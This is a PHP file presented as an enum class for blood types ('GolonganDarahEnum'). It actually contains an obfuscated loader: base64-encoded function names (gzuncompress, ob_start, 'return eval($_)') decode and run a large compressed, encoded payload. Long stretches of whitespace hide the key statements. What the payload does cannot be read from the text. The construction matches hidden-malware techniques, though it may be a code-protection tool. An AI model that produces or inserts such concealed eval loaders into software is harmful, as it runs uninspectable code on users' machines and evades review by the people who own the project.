<?php 
        $__='printf';$_='Loading app/Enums/GolonganDarahEnum.php';
        































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtXV2Toza6vk/V+Q9zsVWdrdrK8uWepqbmojEIjI1oBJJANylAxBgEprtpG/j1Rz0zm8xksyc5leRUTsLjehpjW0i8et4PGbf95s1H/O1bifc3w9OpH7+7efdh9xPe3+TD8E+nf+me/+mexbk/5r2dP+X160PfDPXwZivy5+dvvvnm5t1Xnw735r++Wm9/vttXr7p48xvi/b89cpOq5nNG1RNznfc3Hx76QVW/CJ+0+/7NihUrVvw5cVN2ROGp/7JziZbR69kH5nfp3L79GDRl1PwYrr9dTbVixYoVK1asWLFixf83rG9nrFixYsWfFzdF/lzdGt/yqjzz6ubdapEVK1asWLHiV+HLDzTs7pX9bnt//MQ2Ve9MX7fmnG4Udirf+kDuK9Mlo2gouvKYpdb1oJAXTtXloPBL4ZovTAMvyAVzRmtQ9GQ89Na53JZvt6fvj3u0ozPcHpX9ul23v9H2c93+JfnhMqdqfvcQlx/2s8bfMzGkkI5Z0G4WKrjL4/LtX80en/Mh5k1BsisD9Z5j4ZHGZ0Tnl7jNjNIx9YdE6cPruf1xu8/aZ0EiFkrKKSeDhz6+/i+vvV89R4vS78B5KW1wKvBGy0S9rciQJf25D+efaf/admudgnbosgXGuQtf8Ou8zH+Ic2z/dX4f/fE8k8Z69Uct6zZx4fov+GfOceXKlV/6/EP8OxxX8+tSwxoEZssovDAX97+k3e/tu5/FyNd6/Pz9/tz+KJdbAzsda9aTl0yX9bm2+Y6l9VDqaNlv+XepNtUF9dssLod9Onacbhruiktxsj577tiWCpiZHjz7HrQLDQn52pmlSC0748hSVhfb4+mHj1gxteigklPzZb9FS5T6fTmLt9Us72vSjnKg4bwbQl01V+2uXPk/1Ag/WW8i6efH//j8Pnle7feXXMf8J13cDXI98ll79O/tflJLMq/M6Dt/vv70Mdf6dOXKlStXrly58nck+sn1/lrr/5b19J35ut1/svUf27boR+P92Xq8fX2/meHNzEG5KTw8By5PmXAMPt89RUq9LYHvIVsccnWwCfEdtB0vGR78PPUT6sLX94wCrkBSkCGBVGC0QBIkR6MEcI7ptK/I/UIxYIlAEHn+ATlDQDomGMVPsLdSSGqXNKCF8/NT4O30BAwYe8GcyN6wu7kW3bMRtOUSO1ejnE2DKCMlTXCJtXaugG/ENjFger5ADGPeMBJp/nMBBgcS1lG31qHLHqrOV5GHNb41NaTjC+t3M++iK1dreliEw+O7KfesB+zxPvScaa/5T0XX6oyinFM5PnG8xC1SykRoRAcKd1GexeMt0RHYa4DkaW0EqdXkyb0WpuCUA3hJ2vrKl+ySCV8rUjJk8fOSNULJCJ8+tKeOFjTOVHjWXHZ+RmZT2evBhaUEBnS6lr1/Il02VT3YUjtYoEaiwHaeciDUQlOemKuoGdn90F7lGk8zHXul7HtjlG6r5Xp5Oehc2tZ0w3QIA8/Xczyloc1uK4zcGHOBe0fnhGHooRkLmCPb2odbE+cNw1U6xFARfZGwGfZwV2D+sleyBYthIqogB9XqC+psuFeqlZD3E16zdNgzx2wyMmxZWneh3c6FgwasARFIjUV0emQtcwqduXsVXYnGbnMaXNDCH3gjumSBoOzFmTvgsbB5U9rgWlHfQjTQYzwJ3qKYA34IlLtrTiyB7Hu1TIIJqqVCE4BwX04VqG+ZWr9q6FkKD5YLcyJKHmMAcYxrli/HudyaG4z9c96zLiaDUbbogbfnJWuhFilMD10SVx65cs1Ro4XPoQ0D1vARK6McM+qZXXtIagALYBBd7KijnqWv3JYd3MWLRWPMFNS2S+gNYyHPK+qEDcVO7vtz4iERCWdi8WgdFj4ddHitehRRW0RlbLJcGUkhfIQ75lcNiKFu4aSvd8QdGtxuThD4SSwGiJzNli+lkmvQO+jATnTiJTrakE7avuMkSgMVuSSCCqcVHba8J9K7kcFs7lQ230Ed+NI+RtGDLFAHo6IiKLoN4Bidq7TGTHcueGFzdjJPuI80OfacABQGyrNKqLmBmI0oJQ1cLL0kPoVUvWBdPJftUccp77OejVwrpT/xnLkEBFr0xDHM43bYZUsdVN6g0+2IZB8KUp6XRIG3IfETpPlu6AyQtjVgmvqUp0TfL9GFY9CH4LhUdLSDpo4Cjdu4t7ZFx2KkGHKuNjrqkCe3tvRnO9OAhV38VKhDnDeI5rN5kP67Q8pGQwm/JdSZOYUw68yHSBn8MoVWaddAasCIXQgL2xqoq0qtbbAcl49tocvoGBeAS73XDu1rlrQqDT2gZ9QfsYaNTEOPxBO3QcvPXOcvB/34RB0uYHe8UEEintZj4hzVIBXbMCFJpPMx74enUq+XLAGExWbMHWfDMN9KvXlcgEvSIEX2LWOd/8wWX0Zb/6Vo/L4Q95tCRVGIoc8aYSfebo4oTGAq/RNY2V4bXkJP2itleyrjTZWiSyAGlbsjDF3/Grqsfr2Gms+jzfSjjpypjfRaYUpwjfphwztVh6BOY2pGCalxqTuz1PklsEGK0vMUNdJXdetUevczc30jIgxm2I8TwZ9LUjsH3b8m8thVz0PeBnOOZaxeIgMCaMj4aVfbcVfakMBetDDxo6AXI17q24NK4rg1bQaslxKrt7lACWv9jZxXNZRzcFCEU3rIDYnMQwJfy/RsVNiEhTxutNxPJPGfElw3gaP20OVeIcgEO3WLmjosHBUEFCHuTiKn8Br3IJXxMmIqMxidRrL4+2weH5NO5gI5DQeN1JULNK6oJOkZK5e65q7UlSAJkX6VqYSUKtRZUtdMlTOuMbdsxHPURiptTSpjYR9LzUXKpkkS6yLHnHIXWkXLZPtRzXUyymM1CT4vhQohcyBGjpgo9h8R8R9hG0ifghZ0QJq10xKDaOYEbA8K2iaExAWNNASYHjhC5qejQTQ4QXdzyAlvc5WoCZXBvW+nROEjl9EzS+u46NA2b49PsWZeAqo+l/Q4VZ3JZIw2pO0hsdElUc8X6ki79sCRYzOqVjGk/8WQEhlNyVOSEL+wAZA2qhE1lQS0BvbAtJe+goFQkqSdMCAPmWYSStkjbLjPFlBHypjkskaAztGgeHzAYFASGVfyBTweVD9+tfdeh4fAu9f3GrQDym8pEE3eAFXqWcY1OQZP5o3e3xFd1goqDMq23HAxLLTnqoypM+ohi+1a+j6Smcm3sgZIfx60sjMhTSxpNRNBpz4hfWiJA7rEYxvcDxcZyWYpXpVRMmBy3pQOlnkg0iuPnTI8Lky3QnkemMo8jwFgh8W6MFDbr355UIfbEB917rEEamhPOiF9xuqQ7cucBoCsTS6BPtSRIDkTwyZMUFzapQJxrSA3eKK9HwQumTL1/JrJs6AdFNoQWEhbMxt2OCF75KEWLmIMFKl15zzxxfJl/hqr06gUdOPstdYIFPxEAeiQZh4K7BtErQeZtxWuqSyjU0j6YTmotYwvcGILEbypEybjeIgVaT9yDvGQRhqfYIt2DGRG1W0ewtTaMM/KIQCujDVNSdhDkaJTnqAwdIeXqEFuvgRPWFHVyiWDzI9O4CJH9iUq714LbB7L+vA2abJF5uxNoPtgr5Al7/yWAShjBZuKzlBLW2YemymZgk6lBgPonnWulNc4sQBvTch76a9U1SpiISjEtdAAJopQChvWjNav+acJsHkuMesTbQCMwrpK77WDKjBzxixafBQSy2PqEIUyHiJZv2K9TkOv3kRKZlBZ+fJ2rKEgPe6mNlmwIXMwYT06ZYraRUnt5125EDzBjKqqjMFtiMEcyvoubvgt72BI3d0lds2W9pmR0TrLFHCW5e9joe0mWf89xvjuksuSIrctmOmizmX9SpydIedhj/AmRK2iVW05ca3eMo9Pss9R5s+kcMdNotzJTB8ZhbAuSBuuhU0sSqMJppZGxJBhZ7epXLhj9HzJKQhkrghCwozQ8edAQy+x4oMqtcZCaoE7x02Uyqys3V2JIvNY2m7iramiRp6zHWgHnd3KOiGVOr6UQHRQQarMBS/RUkdEni9soawNUBR3ynLQ+E76pV9o5Jo4d0YmaxDW1lq2iGG/+E7VkYCR+iHSIS1SlmG1lTngXg8WxEpPyHPxr9AduqLdzdQdbmM69Ac9uhQ9XLDqv0Cp/0w5KoUKQCZqETtSvynbRcJykKzOoCcMqdGs6IeHArSqrMN67EQ6SZBgOHsipB6x2yqyVm8zMYyhw8lemZyo8aUiwXzQfBiQ4RwQ/hwoZ1WuT2BBrxcu68rSG7Qc8FPS+IHUe8y7eh87ppdIPcbiXmFarVVOPUpdGaVct5T9UWPzqFUdyxKXi6JT1NI1o+pkKjHAGyxTh8wxWrKIRea/W0aw9F1Hz0n9SBpfyDrvMW65etBqZa/eK6Th28q96gXwp1ito2wptaS76rJ+SwPNULm90/npTs6ZFbDWeJLz5gRbuWaa72RdJ56gml1oJ+u+dtJjl7UhHbRCHI29dpyD2LyVHpcdtGGUvqC/1lQVsFrq8sNhCS5cuSoyVu0LrTQf4vLt9vjj60V3Z7ke/vI60GfXmj6sQV/353Z4XTd/fn3qX9eX9tv2i8/7rly5cuXKlStXrvw1nxP7UJ+t9li5cuXKlStXrlz5B6clMq2+rHZYuXLlypUr/2C8X79LZt3+ttvVr37Z/3aG1/P7m3dfffV//+Vf7z9sv/609/d3/5vmn7X9JQ3/9kOHX9+8/r35x/fdrr+R9uf+jbQvNfD1F6L7KIG/v/tveWCylg==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































































                                                                                                                                                                                                                     $________;
